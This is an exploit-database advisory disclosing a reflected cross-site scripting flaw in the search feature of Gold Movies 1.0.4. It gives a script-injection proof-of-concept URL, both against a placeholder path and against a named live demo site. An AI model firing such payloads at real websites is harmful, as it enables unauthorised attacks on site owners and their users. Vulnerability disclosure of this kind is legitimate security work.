Gold Movies 1.0.4 Cross Site Scripting

2019-01-01T00:00:00
ID PACKETSTORM:150970
Type packetstorm
Reporter Deyaa Muhammad
Modified 2019-01-01T00:00:00

Description

                                        
                                            `# Exploit Title: Gold Movies 1.0.4 - Cross-site Script  
# Google Dork: N/A  
# Date: 1 Jan 2019  
# Exploit Author: Deyaa Muhammad  
# Author EMail: contact [at] deyaa.me  
# Author Blog: http://deyaa.me  
# Vendor Homepage: https://codecanyon.net/user/themesgold  
# Software Link: https://codecanyon.net/item/gold-movies/11371340  
# Demo Website: http://themes-gold.com/movies/  
# Version: 1.0.4  
# Tested on: WIN7_x68/Linux  
# CVE : N/A  
  
# Description:  
A XSS found in "Gold Movies 1.0.4" search section.  
  
# POC Request:  
http://[PATH]/search?q="><script>alert('Deyaa')</script>  
  
#Live Target:  
http://themes-gold.com/movies/search?q="><script>alert('Deyaa')</script>  
`